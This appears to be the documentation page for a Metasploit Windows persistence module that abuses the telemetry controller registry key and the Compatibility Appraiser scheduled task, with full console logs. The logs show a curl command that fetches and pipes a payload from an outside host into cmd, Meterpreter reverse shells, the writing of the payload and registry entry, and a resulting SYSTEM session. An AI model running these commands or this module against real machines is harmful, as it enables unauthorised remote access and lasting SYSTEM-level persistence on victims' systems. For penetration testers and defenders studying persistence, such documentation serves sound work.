## Vulnerable Application This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on, when the scheduled task launches, it will execute the telemetry provider and execute our payload with system permissions. ## Verification Steps 1. Start msfconsole 2. Get an admin level shell on windows 3. Do: `use exploit/windows/persistence/telemetry` 4. Do: `set session #` 5. Do: `run` 6. You should get a shell when the scheduled task runs. ## Options ### PAYLOAD_NAME Name of payload file to write. Random string as default. ### NAME Name of the telemetry program. Random string as default. ## Scenarios ### Windows 10 1909 (10.0 Build 18363) Get an admin level shell ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /KAdxHNQrWO8cy5I90gLkHg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... ``` Install persistence ``` msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/telemetry) > set session 1 session => 1 msf exploit(windows/persistence/telemetry) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/telemetry) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] Powershell detected on system [*] Appraiser name found: Microsoft Compatibility Appraiser [+] Next scheduled runtime: 1/4/2026 4:10:25 AM [*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm [+] The target is vulnerable. Registry writable [+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe [*] Using telemetry id: uYmoknDG [+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user) or wait till 1/4/2026 4:10:25 AM (SYSTEM) [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc ``` Trigger the scheduled task instead of waiting ``` msf exploit(windows/persistence/telemetry) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2344 created. Channel 4 created. Microsoft Windows [Version 10.0.18363.2274] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser". C:\WINDOWS\system32>exit meterpreter > background [*] Backgrounding session 1... msf exploit(windows/persistence/telemetry) > date [*] exec: date Sat Jan 3 01:30:05 PM EST 2026 msf exploit(windows/persistence/telemetry) > [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500 msf exploit(windows/persistence/telemetry) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows WIN10PROLICENSE\windows @ WIN10PROLICENSE 1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2) 2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10PROLICENSE 1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2) ```